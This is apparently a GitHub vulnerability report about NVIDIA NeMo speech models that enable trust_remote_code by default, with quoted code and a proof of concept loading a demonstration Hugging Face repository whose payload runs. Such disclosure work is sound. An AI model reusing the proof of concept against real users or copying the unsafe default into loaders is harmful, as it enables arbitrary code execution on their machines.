
Potential remote code execution via unsafe default trust_remote_code=True in DuplexSTTModel and DuplexEARTTS #15599

@Vancir

Description


The NVIDIA NeMo library contains a remote code execution vulnerability in multiple model classes, including DuplexSTTModel and DuplexEARTTS. These classes load external Hugging Face models and tokenizers with trust_remote_code=True enabled by default, which allows execution of arbitrary code from remote repositories without requiring explicit user consent.

In DuplexSTTModel, the issue occurs when loading the pretrained language model through load_pretrained_hf. The trust_remote_code parameter is derived from configuration using self.cfg.get("trust_remote_code", True), meaning that if the user does not explicitly provide this field, it defaults to True. This results in automatic execution of remote code when loading models from external repositories.

A similar issue exists in DuplexEARTTS, where both the tokenizer and language model are initialized with trust_remote_code=True hardcoded. This forces remote code execution regardless of user intent or configuration, effectively bypassing the expected security boundary.

Root Cause

In DuplexSTTModel:

# Load LLM first
llm = load_pretrained_hf(
    self.cfg.pretrained_llm,
    pretrained_weights=self.cfg.pretrained_weights,
    trust_remote_code=self.cfg.get("trust_remote_code", True),
).train()

Here, trust_remote_code defaults to True when not explicitly specified.
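The pitfall is that the config lookup returns the fallback whenever the key is absent, so a user who never mentions `trust_remote_code` is silently opted in. A minimal sketch of this pattern, using a plain dict in place of the OmegaConf config object NeMo actually uses (names are illustrative):

```python
# Minimal sketch of the unsafe-default pattern (plain dict standing in
# for NeMo's OmegaConf config; repo name is hypothetical).
cfg = {
    "pretrained_llm": "some-org/some-model",
    # The user never sets trust_remote_code at all...
}

# Mirrors self.cfg.get("trust_remote_code", True) in DuplexSTTModel:
flag = cfg.get("trust_remote_code", True)
print(flag)  # True: remote code is trusted purely by omission

# A fail-safe default would require an explicit opt-in instead:
safe_flag = cfg.get("trust_remote_code", False)
print(safe_flag)  # False unless the user deliberately enables it
```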

In DuplexEARTTS:

# Load tokenizer
self.tokenizer = AutoTokenizer(
    self.cfg.pretrained_lm_name,
    use_fast=True,
    trust_remote_code=True,
    bos_token=self.cfg.get("bos_token", None),
    eos_token=self.cfg.get("eos_token", None),
    pad_token=self.cfg.get("pad_token", None),
)  # Note that we are using fast tokenizer

and:

def _load_language_model(self, cfg):
    """Load language model for RVQ-EAR-TTS."""
    if cfg.pretrained_lm_name:
        language_model = load_pretrained_hf(
            self.cfg.pretrained_lm_name, pretrained_weights=True, trust_remote_code=True
        ).eval()
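Because the literal `True` is passed at these call sites, even a user who explicitly opts out in the config is overridden. A sketch of that behavior (the stub below is hypothetical and only stands in for NeMo's `load_pretrained_hf`):

```python
# Sketch: in DuplexEARTTS the literal True is passed to the loader,
# so a user's explicit opt-out never reaches it. The stub is hypothetical.
def load_pretrained_hf_stub(name, pretrained_weights=True, trust_remote_code=False):
    # Stand-in for NeMo's load_pretrained_hf; reports the flag it received.
    return trust_remote_code

cfg = {"pretrained_lm_name": "some-org/some-model", "trust_remote_code": False}

# The call site ignores cfg["trust_remote_code"] and hardcodes True:
effective = load_pretrained_hf_stub(cfg["pretrained_lm_name"], trust_remote_code=True)
print(effective)  # True: the user's False was silently discarded
```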

Proof of Concept

Taking DuplexSTTModel as an example, I created a demonstration model repository on the Hugging Face Hub: XManFromXlab/nemo-DuplexSTTModel-RCE

A victim runs the following code (see test_duplex_stt.py):

from nemo.collections.speechlm2 import DuplexSTTModel

model_id = "XManFromXlab/nemo-DuplexSTTModel-RCE"
cfg = {
    "pretrained_llm": model_id,
    "pretrained_weights": False,
    "audio_loss_weight": 1,
    "text_loss_weight": 3,
    "source_sample_rate": 16000,
    "validation_save_path": "/tmp/test_duplex_stt_logs",
    "perception": {
        "_target_": "nemo.collections.speechlm2.modules.perception.AudioPerceptionModule",
        "preprocessor": {
            "_target_": "nemo.collections.asr.modules.AudioToMelSpectrogramPreprocessor",
            "features": 80,
        },
        "encoder": {
            "_target_": "nemo.collections.asr.modules.ConformerEncoder",
            "feat_in": 80,
            "d_model": 512,
            "n_heads": 8,
            "n_layers": 1,
            "subsampling_factor": 8,
        },
        "modality_adapter": {
            "_target_": "nemo.collections.speechlm2.modules.perception.IdentityConnector",
            "d_model": 512,
        },
        "output_dim": 2048,
    },
    "optimizer": {"_target_": "torch.optim.AdamW"},
}

model = DuplexSTTModel(cfg)

Running this example prints the following lines, confirming that the repository's payload executed:

Execute Malicious Payload!!!
Execute Malicious Payload!!!
Execute Malicious Payload!!!
